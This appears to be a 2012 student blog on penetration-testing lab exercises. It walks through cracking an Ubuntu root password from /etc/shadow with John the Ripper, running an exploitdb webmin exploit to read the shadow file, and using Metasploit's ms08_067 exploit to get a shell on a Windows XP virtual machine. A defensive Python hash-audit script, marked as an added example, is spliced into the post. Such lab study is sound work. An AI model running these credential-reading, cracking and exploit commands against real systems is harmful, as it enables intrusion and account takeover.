Monday, 30 January 2012

connecting in VirtualBox and installing cymothoa

  • done by only changing the network connection to host adapter
  • then open the nc application;
    we connect to Ubuntu with the nc application

  • and also do the settings in Ubuntu


Sorry, I have not been able to install cymothoa in Ubuntu. Guidance, please.


how to find out the root password using JTR

  • to crack the password file, just give the following command: ./unshadow /etc/passwd /etc/shadow > pass



  • to see these passwords you can give the following command: ./john pass


  • it is time to show your root password by using the command: ./john --show pass

and the result: your root password is 123
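From the defender's side, the merged file that unshadow produces can be audited without cracking anything. The following is an added example, not part of the original post: it parses unshadow-style lines and flags accounts stored with an empty password or a legacy hash scheme. The sample lines and hash strings are constructed, and the names `classify` and `audit` are hypothetical.

```python
# Added example: audit unshadow-style lines for weak password storage.
# All sample accounts and hash strings below are constructed, not real.

# crypt(3) scheme identifiers -> (name, considered weak today)
SCHEMES = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False),
    "2b": ("bcrypt", False),
    "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "y": ("yescrypt", False),
}

def classify(field):
    """Return (scheme, weak) for the password field of one line."""
    if field == "":
        return ("empty password", True)   # login without any password
    if field[0] in "!*":
        return ("locked", False)          # no valid hash can match
    if field == "x":
        return ("not merged", False)      # plain /etc/passwd, no hash here
    if field.startswith("$"):
        ident = field.split("$")[1]
        return SCHEMES.get(ident, ("unknown $" + ident + "$", True))
    if len(field) == 13:
        return ("descrypt", True)         # traditional DES, 8-char limit
    return ("unknown", True)

def audit(text):
    """Return [(user, scheme)] for every account with weak storage."""
    findings = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 2 or not parts[0] or parts[0].startswith("#"):
            continue
        scheme, weak = classify(parts[1])
        if weak:
            findings.append((parts[0], scheme))
    return findings

SAMPLE = """\
root:$1$abcdefgh$CONSTRUCTEDnotARealHash00:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
alice:$6$saltsalt$CONSTRUCTEDnotARealHash:1000:1000::/home/alice:/bin/bash
bob::1001:1001::/home/bob:/bin/bash
carol:ab01FAX.bQRSU:1002:1002::/home/carol:/bin/bash
"""

if __name__ == "__main__":
    for user, scheme in audit(SAMPLE):
        print(f"{user}: {scheme}")
```

A strong scheme only slows guessing; a password like the 123 found above falls quickly under any of them, so this check complements a password-length policy rather than replacing it.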

testing John the Ripper

  • run the John the Ripper application
  write ls -l
This displays the contents of a directory, like the dir command in DOS

  • write ./unshadow /etc/passwd /etc/shadow > crack.db

  • next, cat crack.db to display it


  • next, run it in JTR

  • and next, run it in incremental mode for user root.



KO

exploitation in Privilege Escalation


  1. The first step is information gathering and service enumeration using nmap.


 From the nmap scan we can find the discovered open ports,
which are 80, 445, 22, 139, 10000

  • we now try to open 192.168.0.112 together with port 10000.
The page there asks us to enter a username and password.
  

    2. In this second phase we search for vulnerabilities (VA); we could use nessus and exploitdb

 in nessus :

 













Full nessus report: http://pastehtml.com/view/bmhkcdvwv.rtxt



in exploitdb:
  • go to the exploitdb application directory
"./" is the command used to execute
write searchsploit webmin
Why webmin? Because the page at 192.168.0.112:10000 says login to webmin


  • next we use the cp command to move on to the next stage:
write the command cp platforms/multiple/remote/2010.pl ~


  • then check with the ls command that 2017.pl has been copied.
  • next write perl 2017.pl to determine the target: 0 -> HTTP, 1 -> HTTPS

  • then we attack 192.168.0.112 on port 10000 with the file name /etc/shadow and target type 0


Friday, 27 January 2012

exploiting WinXPpro using msfconsole (update)

The first thing we do is run VirtualBox:
next click Devices and select Network. On the tab, under Attached to, select Host-only Adapter. Click OK
  • next open the Command Prompt and write ipconfig
  • we can also use Nmap to see the IP configuration:

  • try pinging the Windows IP address

  • then we scan using nessus
    This is useful for finding the vulnerabilities

  • wait until the process is complete

  • after scanning is complete, let us analyze

  • we first find out their susceptibility
click the highest total port
and now we find the highest level of vulnerability



Full report here: http://pastehtml.com/view/bmdfpksxh.rtxt

  • next, open your console and write msfconsole
 write use exploit/windows/smb/ms08_067_netapi and set lhost and rhost
  • after that we directly exploit
  • time for us to execute:
write execute -f cmd.exe -M -i, then enter your folder.
  • and check in windows

  • here I am trying something new
after we successfully execute
we try to turn it off
 




lessons January 27, 2012

  1. service enumeration
What is service enumeration?
" Intensive study of the target, the search for a user account is valid, and share network resources, and applications for which protection is weak. "

 For this service enumeration we can use nmap, zenmap and nessus
example:
 run your Windows in VirtualBox,
click Command Prompt, and then write ipconfig.
It will show your IP address.
Next open the Zenmap application, enter your Windows IP address, and click Scan.
 Next open the nmap application and write "nmap -A -T4 <Windows IP address>", and click scan:
look at this

 in nessus:



 2. vulnerability identification (CVE, OSVDB)
Here we identify existing vulnerabilities; we can use CVE and OSVDB


 3. vulnerability analysis
 Here we analyze what its vulnerabilities are;
we can use SMB port 445
 
4. gaining access
Gaining access is getting more data to start trying to access the target. It covers peeking at and grabbing passwords, password guessing, and performing a buffer overflow.

5. use exploit repository
An exploit is software that attacks a specific security vulnerability, but it does not always aim to launch an unwanted action. Many computer security researchers use exploits to demonstrate that a system has a vulnerability.
There are bodies of researchers who work with software manufacturers. These researchers are tasked with finding weaknesses in software and, if they find one, they report the findings to the manufacturer so that the manufacturer can take action. However, sometimes an exploit becomes part of malware that attacks a security vulnerability.
we can use exploitdb
etc:

 



6. metasploit
The Metasploit Framework is a development platform to create security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers around the world. The framework is written in the Ruby programming language and includes components written in C and assembler. 
In Metasploit there are 2 things to take note of, namely the payload and the exploit.
  • Exploit = weakness of the target, usually checked with nmap
  • payload = type of attack that will be launched to exploit it.
 we can use:
# msfconsole
# msfcli
# msfgui


etc: